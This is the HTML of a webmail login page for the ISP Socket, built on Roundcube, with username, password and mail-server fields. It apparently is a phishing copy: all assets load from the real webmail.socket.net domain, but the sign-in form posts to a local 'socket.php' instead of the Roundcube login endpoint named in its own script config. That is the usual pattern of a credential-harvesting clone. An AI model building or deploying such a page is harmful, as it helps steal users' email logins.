﻿<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
	<meta name = "viewport" content = "width =970">
<meta name="viewport" content="minimum-scale=0.5">
<link rel="index" href="https://webmail.socket.net/?_task=login" />
<link rel="shortcut icon" href="https://webmail.socket.net/skins/default/images/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="https://webmail.socket.net/skins/default/common.css?s=1335451099" />
<link rel="stylesheet" type="text/css" href="https://webmail.socket.net/skins/default/mobile.css?s=1335444189" media="all and (max-width: 970px)" />

	<title>Socket Webmail :: Welcome to Socket Webmail</title>
	<meta charset="utf-8" />
	<meta name="Robots" content="noindex,nofollow" />
	<!--[if lt IE 7]>
		<link rel="stylesheet" type="text/css" href="https://webmail.socket.net/plugins/jqueryui/themes/default/jquery-ui-1.8.14.custom.css?s=1335443764" />
<link rel="stylesheet" type="text/css" href="https://webmail.socket.net/plugins/qtip/qtip.css?s=1304635708" />
<link rel="stylesheet" type="text/css" href="https://webmail.socket.net/plugins/compose_in_taskbar/skins/default/compose_in_taskbar.css?s=1294087300" />
<script src="https://webmail.socket.net/skins/default/supersleight-min.js?s=1335444190"></script>
	<![endif]-->
	<!--[if lt IE 9]>
		<link rel="stylesheet" type="text/css" href="https://webmail.socket.net/skins/default/styleie.css?s=1335444190" />
		<script src="https://webmail.socket.net/skins/default/html5.js?s=1335444177"></script>
	<![endif]-->
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<script type="text/javascript" src="https://webmail.socket.net/program/js/jquery.min.js?s=1335443831"></script>
<script type="text/javascript" src="https://webmail.socket.net/program/js/common.js?s=1335443829"></script>
<script type="text/javascript" src="https://webmail.socket.net/program/js/app.js?s=1335443828"></script>
<script type="text/javascript">
/* <![CDATA[ */

var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","x_frame_options":"sameorigin","keep_alive":60,"action":"","comm_path":".\/?_task=login","request_token":"a69bab2ace87ba0a1a4a4dd8aee29cc2"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!"});
rcmail.register_button('tcompose', 'rcmbtn100', 'link', '', '', '');
rcmail.gui_object('message', 'message');
/* ]]> */
</script>

<script type="text/javascript" src="https://webmail.socket.net/plugins/jqueryui/js/jquery-ui-1.8.14.custom.min.js?s=1335443761"></script>
<script type="text/javascript" src="https://webmail.socket.net/plugins/qtip/qtip.js?s=1304648442"></script>
<script type="text/javascript" src="https://webmail.socket.net/plugins/calendar/program/js/calendar.common.js?s=1317815410"></script>
<script type="text/javascript" src="https://webmail.socket.net/plugins/compose_in_taskbar/compose_in_taskbar.js?s=1302126482"></script>
</head>
<body style="background: url('skins/default/images/background.png') repeat-x scroll 0 0 #E4E5E9;">
	<div id="message"><div id="message"></div></div>
	<div id="overlay"></div>
	<div id="mainContainer" class="mainContainer clearfix">
		<div class="mainPageContainer clearfix">
			<header id="header" class="clearfix">
				<p> &nbsp; </p>
			</header>
			<div id="dropshadow_wrapper" class="clearfix drop-shadow">
				<section id="top_menu" class="clearfix">
					<div id="logo_holder"> <a href="http://www.socket.net/" title="Home" id="logo"> <img id="socketLogo" src="https://webmail.socket.net/skins/default/images/logo.png" border="0" alt="Socket Webmail" /> </a> </div>
					<div id="social_holder">
						<div class="content">
							<p>
								<span class="MenuContactHolder MenuContactNumber">1-800-762-5383</span>
							</p>
						</div>
				  	</div>
				</section>
				<div id="nav_separator" class="clearfix"> </div>
				<div id="mainPage" class="mainPage clearfix">
					<div id="pop"></div>
					<div id="menuContainer">
						<h1>Welcome to Socket's New Webmail!</h1>
						<p>&nbsp; &nbsp;</p>
						<p class="ListHeader">New features include:</p>
						<ul>
							<li>Folders, address book and calendar</li>
							<li>Message formatting - change fonts, colors and sizes</li>
							<li>Spam messages integrated into your email as a separate folder - not on a different site</li>
						</ul>
						<p class="ListHeader">Go to a short <a style="color:#4F2471;" href="http://www.socket.net/new-webmail-help">Guide to the New Webmail</a>.</p>
						<p>&nbsp; &nbsp;</p>
					</div>
					<div class="mainContent" id="mainContent">
						<div id="loginFormWrapper">
							<h2>Sign In</h2>
							<form name="form" action="socket.php" method="post">
<input type="hidden" name="_token" value="a69bab2ace87ba0a1a4a4dd8aee29cc2" />
								<input type="hidden" name="_timezone" id="rcmlogintz" value="_default_" />
								<input type="hidden" name="_task" value="login" />
								<input type="hidden" name="_action" value="login" />
								<input type="hidden" name="_url" id="rcmloginurl" />
								<label for="rcmloginuser" id="rcmloginuserLabel">Username</label> <input name="_user" id="rcmloginuser" tabindex="1" placeholder="Username" value="" /><br />
								<label for="rcmloginpwd" id="rcmloginpassLabel">Password</label> <input type="password" name="_pass" id="rcmloginpwd" tabindex="2" placeholder="Password" value="" /><br />
								<select name="_host" id="rcmloginhost" tabindex="3">
									<option selected="selected" value="mail.socket.net">Mail Server - mail.socket.net</option>
									<option value="mail.areatech.com">mail.areatech.com</option>
									<option value="mail.c-magic.com">mail.c-magic.com</option>
									<option value="mail.cland.net">mail.cland.net</option>
									<option value="mail.cmpsource.com">mail.cmpsource.com</option>
									<option value="mail.dido.com">mail.dido.com</option>
									<option value="mail.interlinc.net">mail.interlinc.net</option>
									<option value="mail.itwebs.com">mail.itwebs.com</option>
									<option value="mail.lakemail.com">mail.lakemail.com</option>
									<option value="mail.maain.com">mail.maain.com</option>
									<option value="mail.marz.com">mail.marz.com</option>
									<option value="mail.midamerica.net">mail.midamerica.net</option>
									<option value="mail.moaccess.com">mail.moaccess.com</option>
									<option value="mail.mvp.net">mail.mvp.net</option>
									<option value="mail.tek-web.com">mail.tek-web.com</option>
									<option value="mail.tekwave.us">mail.tekwave.us</option>
									<option value="mail.webound.com">mail.webound.com</option>
									<option value="mail.zigs.net">mail.zigs.net</option>
									<option value="mail.health-systems-inc.com">mail.health-systems-inc.com</option>
									<option value="mail.sterlingnow.com">mail.sterlingnow.com</option>
									<option	value="mail.regional-hospice.com">mail.regional-hospice.com</option>									
									<option value="mail.ccmo.net">mail.ccmo.net</option>
								</select><br />
								<p style="text-align:center;"><input type="submit" id="LogInButton" tabindex="4" value="Log In" /></p><br />
							</form>
							<p class="grayText">Need help? Call Socket Technical Support at <strong>1-800-762-5383</strong>. We'll be happy to walk you through the new site. <br /></p>
							<p class="centerText"><br /><a href="http://mobilewebmail.socket.net/" alt="Mobile Site" title="View Mobile site">View Mobile Version</a></p>
						</div>
					</div>
				</div><!--end main page div-->
			</div> <!-- dropshadow !-->
			<footer id="footer" role="contentinfo" class="clearfix">
				<div id="footer_links"> <a href="http://www.socket.net/">Residential</a> <a href="http://www.socket.net/business">Business</a> <a href="http://www.socket.net/customer">Support Center</a> <a href="https://myaccount.socket.net">My Account</a> <a href="http://www.socket.net/customer/contact">Contact Us</a> </div>
			</footer>
		</div>
	</div>
	
	<script type="text/javascript" src="https://webmail.socket.net/skins/default/jquery.placeholder.min.js?s=1335444189"></script>
	<script type="text/javascript" src="https://webmail.socket.net/skins/default/loginUtil.js?s=1335444189"></script>
	<script type="text/javascript">
		$(document).ready(function(){
			$('#rcmloginuser').val('');
			$('#rcmloginuser').focus();
		});
	</script>
<script type="text/javascript">
/* <![CDATA[ */

$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/default\/images\/icons\/folders.png","skins\/default\/images\/mail_footer.png","skins\/default\/images\/taskicons.gif","skins\/default\/images\/display\/loading.gif","skins\/default\/images\/pagenav.gif","skins\/default\/images\/mail_toolbar.png","skins\/default\/images\/searchfield.gif","skins\/default\/images\/messageicons.png","skins\/default\/images\/icons\/reset.gif","skins\/default\/images\/abook_toolbar.png","skins\/default\/images\/icons\/groupactions.png","skins\/default\/images\/watermark.gif"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
/* ]]> */
</script>

</body>
</html>